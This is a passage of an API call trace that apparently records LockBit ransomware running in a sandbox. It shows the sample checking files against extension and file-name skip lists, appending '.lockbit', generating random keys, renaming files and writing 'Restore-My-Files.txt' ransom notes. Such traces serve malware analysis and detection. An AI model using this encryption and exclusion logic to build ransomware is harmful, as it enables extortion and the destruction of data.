lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.556] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.556] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PSSKETLG.WMF") returned 1 [0173.557] lstrcmpiW (lpString1="ntldr", lpString2="PSSKETLG.WMF") returned -1 [0173.557] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PSSKETLG.WMF") returned -1 [0173.557] lstrcmpiW (lpString1="bootsect.bak", lpString2="PSSKETLG.WMF") returned -1 [0173.557] lstrcmpiW (lpString1="autorun.inf", lpString2="PSSKETLG.WMF") returned -1 [0173.557] lstrcmpiW (lpString1="thumbs.db", lpString2="PSSKETLG.WMF") returned 1 [0173.557] lstrcmpiW (lpString1="iconcache.db", lpString2="PSSKETLG.WMF") returned -1 [0173.557] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.557] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETLG.WMF") returned=".WMF" [0173.557] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.557] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.557] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.558] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.558] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETLG.WMF.lockbit") returned 72 [0173.558] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETLG.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pssketlg.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0173.563] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.563] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.563] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3594) returned 1 [0173.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.563] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.564] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.564] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.566] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETLG.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETLG.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.566] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.566] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.567] free (_Block=0x1fa2ed8) [0173.567] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETLG.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.567] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.567] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.567] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5a7450f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSSKETSM.WMF", cAlternateFileName="")) returned 1 [0173.567] lstrcmpiW (lpString1=".", lpString2="PSSKETSM.WMF") returned -1 [0173.567] lstrcmpiW (lpString1="..", lpString2="PSSKETSM.WMF") returned -1 [0173.567] PathFindExtensionW (pszPath="PSSKETSM.WMF") returned=".WMF" [0173.567] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.567] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.568] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.568] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PSSKETSM.WMF") returned 1 [0173.569] lstrcmpiW (lpString1="ntldr", lpString2="PSSKETSM.WMF") returned -1 [0173.569] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PSSKETSM.WMF") returned -1 [0173.569] lstrcmpiW (lpString1="bootsect.bak", lpString2="PSSKETSM.WMF") returned -1 [0173.569] lstrcmpiW (lpString1="autorun.inf", lpString2="PSSKETSM.WMF") returned -1 [0173.569] lstrcmpiW (lpString1="thumbs.db", lpString2="PSSKETSM.WMF") returned 1 [0173.569] lstrcmpiW (lpString1="iconcache.db", lpString2="PSSKETSM.WMF") returned -1 [0173.569] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.569] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETSM.WMF") returned=".WMF" [0173.569] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.569] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.569] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.570] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.571] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.571] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.571] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETSM.WMF.lockbit") returned 72 [0173.571] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETSM.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pssketsm.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0173.577] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.577] malloc (_Size=0x40068) returned 0x3d70450 [0173.577] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1910) returned 1 [0173.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0173.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0173.579] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0173.580] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETSM.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETSM.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.580] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.580] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.581] free (_Block=0x1fa2ed8) [0173.581] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSSKETSM.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.581] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.582] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d0aad90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb12, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWAVY.WMF", cAlternateFileName="")) returned 1 [0173.582] lstrcmpiW (lpString1=".", lpString2="PSWAVY.WMF") returned -1 [0173.582] lstrcmpiW (lpString1="..", lpString2="PSWAVY.WMF") returned -1 [0173.582] PathFindExtensionW (pszPath="PSWAVY.WMF") returned=".WMF" [0173.582] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.582] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.583] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.583] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PSWAVY.WMF") returned 1 [0173.584] lstrcmpiW (lpString1="ntldr", lpString2="PSWAVY.WMF") returned -1 [0173.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PSWAVY.WMF") returned -1 [0173.585] lstrcmpiW (lpString1="bootsect.bak", lpString2="PSWAVY.WMF") returned -1 [0173.585] lstrcmpiW (lpString1="autorun.inf", lpString2="PSWAVY.WMF") returned -1 [0173.585] lstrcmpiW (lpString1="thumbs.db", lpString2="PSWAVY.WMF") returned 1 [0173.585] lstrcmpiW (lpString1="iconcache.db", lpString2="PSWAVY.WMF") returned -1 [0173.585] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.585] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSWAVY.WMF") returned=".WMF" [0173.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.585] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.585] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.586] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.586] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSWAVY.WMF.lockbit") returned 70 [0173.586] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PSWAVY.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pswavy.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.587] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.587] malloc (_Size=0x40068) returned 0x3ef0008 [0173.587] GetFileSizeEx (in: 